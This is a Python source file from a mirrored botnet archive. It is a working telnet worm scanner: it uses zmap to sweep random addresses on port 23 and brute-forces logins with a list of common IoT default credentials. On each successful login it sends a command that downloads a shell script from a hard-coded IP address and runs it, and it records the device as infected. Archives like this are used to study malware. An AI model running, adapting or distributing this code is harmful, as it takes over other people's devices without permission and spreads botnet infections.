6
0
mirror of https://github.com/threatland/TL-BOTS synced 2024-06-16 03:50:10 +00:00
TL-BOTS/TL.EXPLOIT_SCAN/SCANNER.Telnet/telnet_zmap_scanner.cace63.py
2019-10-02 16:41:26 -04:00

212 lines
7.0 KiB
Python
Executable File

#!/usr/bin/python
import threading
import sys, os, re, time, random, socket, select, subprocess
# USE ONLY 1 TO 16 THREADS UNLESS U WANNA CRASH UR SERVER
if len(sys.argv) < 3:
print "Usage: python "+sys.argv[0]+" <threads> <output file>"
sys.exit()
global rekdevice
rekdevice = "cd /tmp; wget http://185.10.68.196/update.sh; busybox wget http://185.10.68.196/update.sh; chmod 777 update.sh; sh update.sh; rm -f update.sh" #command to send
combo = [
"root:root",
"root:",
"admin:admin",
"telnet:telnet",
"support:support",
"user:user",
"admin:",
"admin:password",
"root:vizxv",
"root:admin",
"root:xc3511",
"root:888888",
"root:xmhdipc",
"root:default",
"root:juantech",
"root:123456",
"root:54321",
"root:12345",
"root:pass",
"ubnt:ubnt",
"root:klv1234",
"root:Zte521",
"root:hi3518",
"root:jvbzd",
"root:anko",
"root:zlxx.",
"root:7ujMko0vizxv",
"root:7ujMko0admin",
"root:system",
"root:ikwb",
"root:dreambox",
"root:user",
"root:realtek",
"root:00000000",
"admin:1111111",
"admin:1234",
"admin:12345",
"admin:54321",
"admin:123456",
"admin:7ujMko0admin",
"admin:1234",
"admin:pass",
"admin:meinsm",
"admin:admin1234",
"root:1111",
"admin:smcadmin",
"admin:1111",
"root:666666",
"root:password",
"root:1234",
"root:klv123",
"Administrator:admin",
"service:service",
"supervisor:supervisor",
"guest:guest",
"guest:12345",
"guest:12345",
"admin1:password",
"administrator:1234",
"666666:666666",
"888888:888888",
"tech:tech",
"mother:fucker"
]
threads = int(sys.argv[1])
output_file = sys.argv[2]
def readUntil(tn, string, timeout=8):
buf = ''
start_time = time.time()
while time.time() - start_time < timeout:
buf += tn.recv(1024)
time.sleep(0.1)
if string in buf: return buf
raise Exception('TIMEOUT!')
def recvTimeout(sock, size, timeout=8):
sock.setblocking(0)
ready = select.select([sock], [], [], timeout)
if ready[0]:
data = sock.recv(size)
return data
return ""
class router(threading.Thread):
def __init__ (self, ip):
threading.Thread.__init__(self)
self.ip = str(ip).rstrip('\n')
def run(self):
global fh
username = ""
password = ""
for passwd in combo:
if ":n/a" in passwd:
password=""
else:
password=passwd.split(":")[1]
if "n/a:" in passwd:
username=""
else:
username=passwd.split(":")[0]
try:
tn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tn.settimeout(1)
tn.connect((self.ip, 23))
except Exception:
tn.close()
break
try:
hoho = ''
hoho += readUntil(tn, ":")
if ":" in hoho:
tn.send(username + "\r\n")
time.sleep(0.1)
else:
tn.close()
return
hoho = ''
hoho += readUntil(tn, ":")
if ":" in hoho:
tn.send(password + "\r\n")
time.sleep(0.1)
prompt = ''
prompt += recvTimeout(tn, 40960)
if "#" in prompt or "$" in prompt:
for bad in ["nvalid", "ailed", "ncorrect", "enied", "error", "goodbye", "bad", "timeout", "##"]:
if bad in prompt.lower():
print "\033[32m[\033[31m+\033[32m] [\033[31mFAILED \033[31m-> \033[32m%s\033[37m:\033[33m%s\033[37m:\033[32m%s\033[37m"%(username, password, self.ip)
tn.close()
continue
success = True
else:
success = False
tn.close()
if success == True:
try:
print "\033[32m[\033[31m+\033[32m] \033[33mGOTCHA \033[31m-> \033[32m%s\033[37m:\033[33m%s\033[37m:\033[32m%s\033[37m"%(username, password, self.ip)
fh.write(self.ip + ":23 " + username + ":" + password + "\n")
fh.flush()
tn.send("sh\r\n")
time.sleep(0.1)
tn.send("shell\r\n")
time.sleep(0.1)
tn.send("ls /\r\n")
time.sleep(1)
timeout = 8
buf = ''
start_time = time.time()
while time.time() - start_time < timeout:
buf += recvTimeout(tn, 40960)
time.sleep(0.1)
if "tmp" in buf and "unrecognized" not in buf:
tn.send(rekdevice + "\r\n")
print "\033[32m[\033[31m+\033[32m] \033[33mINFECTED \033[31m-> \033[32m%s\033[37m:\033[33m%s\033[37m:\033[32m%s\033[37m"%(username, password, self.ip)
f = open("infected.txt", "a")
f.write(self.ip + ":23 " + username + ":" + password + "\n")
f.close()
time.sleep(10)
tn.close()
return
tn.close()
return
except:
tn.close()
else:
tn.close()
except:
tn.close()
def worker():
while True:
cmd = "zmap -p23 -N 10000 -f saddr -q --verbosity=0"
process = subprocess.Popen(cmd.split(" "), stdout=subprocess.PIPE)
for line in iter(process.stdout.readline, ''): # replace '' with b'' for Python 3
line = line.replace("\n", "")
threadstarted = False
while not threadstarted:
try:
thread = router(line)
thread.start()
threadstarted = True
except:
pass
global fh
fh = open(output_file, "a")
for l in xrange(threads):
try:
t = threading.Thread(target=worker)
t.start()
except:
pass
print "Started " + str(threads) + " scanner threads! Press enter to stop."
raw_input()
os.kill(os.getpid(), 9)